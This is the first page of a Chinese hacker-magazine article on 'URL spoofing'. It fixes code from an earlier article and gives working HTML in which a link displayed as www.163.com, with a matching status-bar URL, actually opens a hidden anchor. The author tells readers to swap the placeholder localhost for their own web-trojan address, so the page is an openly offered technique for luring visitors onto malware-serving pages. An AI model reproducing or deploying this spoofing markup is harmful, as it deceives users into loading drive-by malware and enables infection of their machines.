本文已发表于〈黑客X档案〉杂志第9期..邪恶八进制首发..转载请注明版权.
作者BLOG:http://www.ciker.org/
第7期的X档案〈挂马,别忘了还有phpwind论坛〉一文中提及到URL欺骗的方式引起了我极大的兴趣..就自己动手试了一下..发现作者提供的代码有点问题.
作者提供的完整代码为
〈p〉〈a id ="exploit" href="http://网马地址"〉〈/a〉〈/p〉
〈div〉
〈a herf ="http://www.163.com/" target="_blank"〉
〈table〉
〈caption〉
〈a herf ="http://www.163.com" target="_blank"〉
〈lable for ="exploit"〉
〈u styke = "cursor:pointer:color:black"〉
www.163.com
〈/u〉
〈/lable〉
〈/a〉
〈/caption〉
〈/lable〉
〈/a〉
〈/div〉
单从这一句就可以看到这段代码是错的.因为连接的代码应该是为href才对..这里作者不细心犯下了一个错误.很容易误导我们的读者..所以要提醒各位作者以后写稿时千万要注意.
我们只需把代码中的herf替换为href就可以了..保存代码后访问此页面测试..我发现并不像作者说的那样"表面上指向的连接是www.163.com,其实真实的连接是我们的网马地址"
打开页面后显示www.163.com,,当我们鼠标放上去的时候状态栏显示的http://www.163.com/..点击之后打开的还是www.163.com.
下面的代码是我从EST里找来的..
〈p〉〈a id="SPOOF" href="http://localhost/"〉〈/a〉〈/p〉
〈div〉
〈a href="http://www.163.com" target="_blank"〉
〈table〉
〈caption〉
〈label for="SPOOF"〉
〈u style="cursor: pointer; color: blue"〉
www.163.com
〈/u〉
〈/label〉
〈/caption〉
〈/table〉
〈/a〉
〈/div〉
对比一下就会发现第一个代码比以上的这个代码多了一条
就因为这么一句代码错误..导致了欺骗不成功...
既然我们知道了错误所在.
下面我们就以实例来演示一下URL欺骗.保存以上代码为任意文件名.但后缀要是htm文件. 打开此文件.看到www.163.com我们把鼠标移动上去,会看到状态栏显示为http://www.163.com/
最终打开的还是http://localhost/
实际运用中可以把http://localhost/换为你自己的网页木马地址..
[1] [2] 下一页
[组图]URL欺骗初探-黑客技术
您现在的位置: